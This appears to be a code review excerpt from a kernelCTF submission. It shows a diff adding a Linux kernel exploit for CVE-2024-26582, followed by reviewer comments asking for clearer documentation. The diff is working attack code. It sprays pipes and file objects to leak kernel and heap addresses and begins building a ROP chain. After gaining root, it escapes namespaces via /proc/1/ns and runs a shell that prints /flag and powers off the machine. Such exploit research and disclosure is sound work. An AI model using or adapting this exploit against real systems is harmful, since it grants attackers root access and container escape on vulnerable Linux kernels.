pocs/linux/kernelctf/CVE-2024-26582_mitigation/exploit/mitigation-v4-6.6/exploit.c

```diff
@@ -0,0 +1,462 @@
+    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
+        SYSCHK(write(pipe_fd[i][1], save_page, sizeof(save_page))); // restore page
+        SYSCHK(read(pipe_fd[i][0], tmp, sizeof(tmp)));
+    }
+
+    puts("[+] We are Ro0ot!");
+    setns(open("/proc/1/ns/mnt", O_RDONLY), 0);
+    setns(open("/proc/1/ns/pid", O_RDONLY), 0);
+    setns(open("/proc/1/ns/net", O_RDONLY), 0);
+    
+    char* shell[] = {
+        "/bin/sh",
+        "-c",
+        "/bin/cat /flag && echo ; echo o>/proc/sysrq-trigger",
+        NULL,
+    };
+    execve(shell[0], shell, NULL);
+}
+
+void spray_pipe() {
+    char buf[0x1000];
+    memset(buf, 'C', sizeof(buf));
+
+    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
+        write(pipe_fd[i][1], buf, sizeof(buf));
+        usleep(100);
+    }
+}
+
+int main(int argc, char *argv[]) {
+    pin_cpu(0);
+    save_state();
+    if (argc > 1) {
+        PORT = atoi(argv[1]);
+    }
+    else {
+        srand(time(NULL));
+
+        PORT = rand() % (65535 - 1024 + 1) + 1024;
+    }
+    int sock = socket(AF_ALG, SOCK_SEQPACKET, 0);
+    struct sockaddr_alg sa = {
+        .salg_family = AF_ALG,
+        .salg_type = "aead",
+        .salg_name = "cryptd(ccm(aes))",
+    };
+    bind(sock, (struct sockaddr *)&sa, sizeof(sa));
+    for (int i = 0; i < PIPE_SPRAY_NUM; i ++) {
+
+        if (pipe(pipe_fd[i]) < 0) {
+            printf("[x] failed to alloc %d pipe!", i);
+            die("FAILED to create pipe!");
+        }
+    }
+    int pipes[2];
+    pipe(pipes);
+
+    pid_t pid = fork();
+
+    if (pid < 0) {
+        perror("fork");
+        exit(1);
+    }
+
+    if (pid == 0) {
+        run_server(pipes[0]);
+        puts("Server done");
+
+    } else {
+        pthread_t p;
+        pthread_create(&p, 0, run_client, 0);
+        pthread_join(p, 0);
+    }
+    pin_cpu(1);
+    spray_pipe();
+  
+    SYSCHK(write(pipes[1], "A", 1));
+    usleep(50);
+    int spray_fds[0x80];
+    char buff[1024] = {};
+    for (int i = 0; i < sizeof(spray_fds)/4; i++) {
+        spray_fds[i] = SYSCHK(open("/tmp/tmp_file", O_RDWR | O_CREAT, 0666));
+        SYSCHK(write(spray_fds[i], buff, i));
+    }
+
+    u64 buf[0x1000/8];
+    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
+        SYSCHK(read(pipe_fd[i][0], buf, sizeof(buf)));
+        for (int j = 0; j < sizeof(buf)/8; j++)
+            if (buf[j] == 0x4f801f00000000) {
+                goto buildrop;
+            }
+    }
+    for (int i = 0; i < sizeof(spray_fds)/4; i++) {
+        SYSCHK(close(spray_fds[i]));
+    }
+    puts("retry");
+    usleep(5000);
+    system(argv[0]);
+    exit(0);
+buildrop:
+    memcpy(save_page, buf, sizeof(buf));
+    close(sock);
+    heap_base = (buf[6]-0x30) >> 12 << 12;
+    info("heap_base", heap_base);
+    kbase = buf[22] - SHMEM_FILE_OPERATIONS;
+    void *victim_file_addr = buf;
+    size_t victim_file_idx = *(size_t *)(victim_file_addr + OFFSET_FILE_FPOS);
+    size_t rop_id = *(size_t *)(victim_file_addr+0x100 + OFFSET_FILE_FPOS);
```

Comment:
Add a comment that the `f_pos` field contains the index of the sprayed file object (refer back to the loop which wrote `i` bytes of data). Also instead of `0x100` use something like `#define FILE_KMALLOC_SIZE 256` and then make a comment how you are using the next two `file` objects to store ROP chain and stack pivots.

Reply:
Hmmm I don't see the comment about that the `f_pos` field contains the index of the sprayed file object. Can you check if your change made into the PR?